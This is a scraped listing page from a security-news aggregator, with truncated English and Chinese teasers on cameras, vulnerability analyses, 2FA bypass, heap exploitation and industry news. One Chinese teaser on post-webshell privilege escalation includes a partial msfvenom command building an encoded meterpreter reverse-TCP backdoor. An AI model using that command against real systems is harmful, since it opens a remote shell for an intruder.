Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Browsing all 12749 articles
Browse latest View live

Image may be NSFW.
Clik here to view.

Smart Outdoor Security Camera 'Netatmo Presence' Now Available

Announced back at CES earlier this year , Netatmo today is officially launching its smart outdoor security camera, called " Presence ," for $299.99. Using a "breakthrough deep-learning algorithm," the...

View Article



Testing for Vulnerable Remember Password and Password Reset

Brief Summary Most web applications allow users to reset their password if they have forgotten it, usually by sending them a password reset email and/or by asking them to answer one or more “security...

View Article

Image may be NSFW.
Clik here to view.

Windows security hole, exposed by Google, puts Microsoft at center of Russian...

The rivalrybetween Microsoft and Google might not matchthe onebetween Donald Trump and Hillary Clinton, but it goes back many more years, and it’s surfacing again this week in a story with...

View Article

Image may be NSFW.
Clik here to view.

Netatmo Presence review: This outdoor home security camera/floodlight...

Wi-Fi security camera/porch light mash-ups like the Netatmo Presence make a whole lot of sense. The best place to locate an outdoor security camera is near an exterior door, and exterior doors nearly...

View Article

Image may be NSFW.
Clik here to view.

Pixel phones as secure as iPhones, claims Android head of security

Android phones are just as secure as iPhones, director of security at Android, Adrian Ludwig, claims, as long as they receive timely security patches. This, of course, means that the Google Pixel,...

View Article


Image may be NSFW.
Clik here to view.

【技术分享】多工具多用户的HTTP代理

【技术分享】多工具多用户的HTTP代理 2016-11-03 14:21:00 来源:安全客 作者:WisFree 阅读:240次 点赞(0) 收藏 翻译:WisFree 预估稿费:200RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 基础知识...

View Article

Image may be NSFW.
Clik here to view.

【技术分享】OWA和Offic365双因子认证绕过(附演示视频)

【技术分享】OWA和Offic365双因子认证绕过(附演示视频) 2016-11-03 16:08:22 来源:blackhillsinfosec 作者:sinensis 阅读:629次 点赞(0) 收藏 翻译:sinensis 预估稿费:200RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 前言 全面公布:BLACK...

View Article

Image may be NSFW.
Clik here to view.

【漏洞分析】MS16-124:微软内核整型溢出漏洞

【漏洞分析】MS16-124:微软内核整型溢出漏洞 2016-11-03 14:59:09 来源:安全客 作者:scriptkid 阅读:1009次 点赞(0) 收藏 翻译:scriptkid 预估稿费:100RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 前言...

View Article


Image may be NSFW.
Clik here to view.

美国电力公司 AES 举办竞赛公开征求无人机技术

【Technews科技新报】无人机在风能领域已经开始有许多企业研究其应用,不过,美国爱依斯电力公司( AES )认为无人机的潜力不只于此,决定公开向外征求无人机技术,于 2016 年 11 月举办无人机于电业应用的公开竞赛。 AES...

View Article


The new age of quantum computing

Quantum encryption is the holy grail of truly secure communications. If and when quantum computing becomes a widespread reality, many public-key algorithms will become obsolete. This includes those...

View Article

Image may be NSFW.
Clik here to view.

Containerization and Security

C ontainerization is not only an exciting foundation of DevOps; it is also an answer to several critical operational issues. For developers, building software once, packaging it and running it...

View Article

Image may be NSFW.
Clik here to view.

Cisco sales tick up, CEO Robbins bullish on data center, security, collaboration

Cisco announced Wednesday that it eked out 1% revenue growth in its fiscal first quarter, compared to the same quarter last year, in what CEO Chuck Robbins described as a “challenging global business...

View Article

Image may be NSFW.
Clik here to view.

网络安全之用MSF进行提权 网络安全 MSF MSF提权 WEB渗透 system权限

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7...

View Article


Redis 远程代码执行漏洞(CVE-2016-8339) Redis Redis漏洞 远程代码执行漏洞 漏洞分析

受影响系统: Redis Redis 3.2.x < 3.2.4 描述: BUGTRAQ ID: 93283 CVE(CAN) ID: CVE-2016-8339 Redis是一个开源、支持网络、基于内存、键值对存储数据库,使用ANSI C编写。 Redis 3.2.x < 3.2.4版本存在缓冲区溢出漏洞,可导致任意代码执行。Redis数据结构存储的CONFIG...

View Article

Image may be NSFW.
Clik here to view.

PHP反序列化漏洞成因及漏洞挖掘技巧与案例 PHP反序列化 PHP漏洞 漏洞成因 漏洞挖掘技巧 ...

一、序列化和反序列化...

View Article


Image may be NSFW.
Clik here to view.

现代化的堆相关漏洞利用技巧 漏洞利用技巧 堆概念 堆溢出 UAF漏洞

现在的漏洞绝大部分都出在了堆这一部分,所以了解一些现在常用的漏洞利用技巧是非常必要的。 堆的概念 堆是一个用于动态分配的内存池。使用malloc()函数可以从堆中申请内存。而使用free()函数可以释放由malloc函数申请的内存。下面来看看一个程序运行起来后它的一个内存布局是怎样的。 下面给出一个通过动态分配使用堆内存的例子。int main(){char * buffer = NULL;/*...

View Article

Image may be NSFW.
Clik here to view.

VBulletin 核心插件 forumrunner SQL注入(CVE-2016-6195)漏洞分析

Author: janes(知道创宇404安全实验室) Date: 2016-11-15 漏洞概述 漏洞简介 vBulletin 是一个商业论坛程序,使用php语言编写,有研究者发现VBulletin核心插件 forumrunner 存在SQL注入漏洞: CVE-2016-6195 . 插件 forumrunner 默认开启, 利用该漏洞,攻击者能够利用SQL注入漏洞脱库。 漏洞影响...

View Article


Image may be NSFW.
Clik here to view.

梁景祯,警察在找你!

Ban:huitailang【多次注册马甲发布软件捆绑木马】 此人最早可以追溯到2015年4月的大号418500646发布软件被发现捆绑木马封号了 之后,此人乐此不疲,依然时不时注册账号来发个软件捆绑木马,利用时下比较热门的软件如 ”百度云加速破解版“、”TeamViewer破解版“...

View Article

Image may be NSFW.
Clik here to view.

How to seek and destroy advanced persistent threats

With the rise of ransomware against hospitals, attacks against the Democratic National Committee (DNC), and even major tech CEOs getting hacked , no one is immune to having their information stolen....

View Article

Image may be NSFW.
Clik here to view.

Backdoor found on some Android phones that sends personal data to Chinese server

Those who have been usingAndroid since the early days know how much the security situation has improved. But it’s still far from perfect. So many companies are making and selling phones, that...

View Article
Browsing all 12749 articles
Browse latest View live




Latest Images